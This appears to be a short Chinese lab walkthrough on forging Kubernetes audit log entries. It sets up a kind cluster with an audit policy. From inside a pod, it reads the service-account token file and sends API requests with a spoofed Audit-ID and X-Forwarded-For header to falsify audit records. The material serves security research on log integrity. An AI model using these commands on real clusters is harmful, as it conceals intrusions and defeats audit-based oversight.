伪造 Kubernetes 审计日志

apiVersion: audit.k8s.io/v1 # This is required.kind: Policy# Don't generate audit events for all requests in RequestReceived stage.omitStages:  - "RequestReceived"rules:  # Log pod changes at RequestResponse level  - level: RequestResponse    resources:    - group: ""      # Resource "pods" doesn't match requests to any subresource of pods,      # which is consistent with the RBAC policy.      resources: ["pods"]  # Log "pods/log", "pods/status" at Metadata level  - level: Metadata    resources:    - group: ""      resources: ["pods/log", "pods/status"]
  # Don't log requests to a configmap called "controller-leader"  - level: None    resources:    - group: ""      resources: ["configmaps"]      resourceNames: ["controller-leader"]
  # Don't log watch requests by the "system:kube-proxy" on endpoints or services  - level: None    users: ["system:kube-proxy"]    verbs: ["watch"]    resources:    - group: "" # core API group      resources: ["endpoints", "services"]
  # Don't log authenticated requests to certain non-resource URL paths.  - level: None    userGroups: ["system:authenticated"]    nonResourceURLs:    - "/api*" # Wildcard matching.    - "/version"
  # Log the request body of configmap changes in kube-system.  - level: Request    resources:    - group: "" # core API group      resources: ["configmaps"]    # This rule only applies to resources in the "kube-system" namespace.    # The empty string "" can be used to select non-namespaced resources.    namespaces: ["kube-system"]
  # Log configmap and secret changes in all other namespaces at the Metadata level.  - level: Metadata    resources:    - group: "" # core API group      resources: ["secrets", "configmaps"]
  # Log all other resources in core and extensions at the Request level.  - level: Request    resources:    - group: "" # core API group    - group: "extensions" # Version of group should NOT be included.
  # A catch-all rule to log all other requests at the Metadata level.  - level: Metadata    # Long-running requests like watches that fall under this rule will not    # generate an audit event in RequestReceived.    omitStages:      - "RequestReceived"

docker pull kindest/node:v1.27.1
kind create cluster --config - --image kindest/node:v1.27.1 <<EOFkind: ClusterapiVersion: kind.x-k8s.io/v1alpha4nodes:- role: control-plane  kubeadmConfigPatches:  - |    apiVersion: kubeadm.k8s.io/v1beta3    kind: ClusterConfiguration    metadata:      name: config    apiServer:      extraArgs:        audit-policy-file: "/auditing/audit_policy.yaml"        audit-log-path: "/auditing/audit.log"      extraVolumes:      - name: "auditing"        hostPath: "/auditing"        mountPath: "/auditing"        readOnly: false        pathType: "Directory"  extraMounts:  - hostPath: /root/k8s_audit/     containerPath: /auditing    propagation: NoneEOF

kind load docker-image --name kind alpine:latestkubectl run test-pod --image=docker.io/library/alpine:latest --restart=Always --image-pull-policy=IfNotPresent --command -- /bin/sh -c "while true; do sleep 3600; done"

# 安装curlsed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositoriesapk add curl
# 伪造Audit-ID发起请求env | grep KUBERNETES_SERVICE_HOSTexport TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)curl -s -k -H "Audit-ID: 11111111-aeff-4d18-8add-fec2289ef296" -H "Authorization: Bearer $TOKEN" https://10.96.0.1:443/api/v1/pods/

export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)curl -s -k -H "X-Forwarded-For: 10.96.0.1" -H "Audit-ID: 11111111-aeff-4d18-8add-fec2289ef296" -H "Authorization: Bearer $TOKEN" https://10.96.0.1:443/api/v1/pods/